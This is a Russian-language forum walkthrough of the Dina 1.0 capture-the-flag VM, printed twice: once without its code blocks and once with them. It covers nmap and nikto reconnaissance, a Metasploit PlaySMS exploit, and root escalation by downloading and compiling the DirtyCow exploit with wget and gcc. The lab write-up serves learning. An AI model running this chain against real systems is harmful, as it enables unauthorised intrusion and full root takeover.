Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0.
Для начала, как обычно немного разведки:
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
Запускаем:
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Переименуем и скомпилируем:
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Переподключаемся к шеллу и меняем пользователя на firefart:
Теперь осталось взять флаг:
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)
Взяли несложную Dina 1.0.
Для начала, как обычно немного разведки:
Код:
netdiscoverDina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Код:
nmap –sV –A 192.168.0.107Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Код:
nikto –h 192.168.0.107Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
Код:
msfconsole
search playsmsПо описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
Запускаем:
Код:
exploitДве трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificateПереименуем и скомпилируем:
Код:
gcc -pthread dirty.c -o dirty –lcryptЗапускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Код:
./dirthyПереподключаемся к шеллу и меняем пользователя на firefart:
Код:
suТеперь осталось взять флаг:
Код:
cd /root
cat flag.txtНа этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)
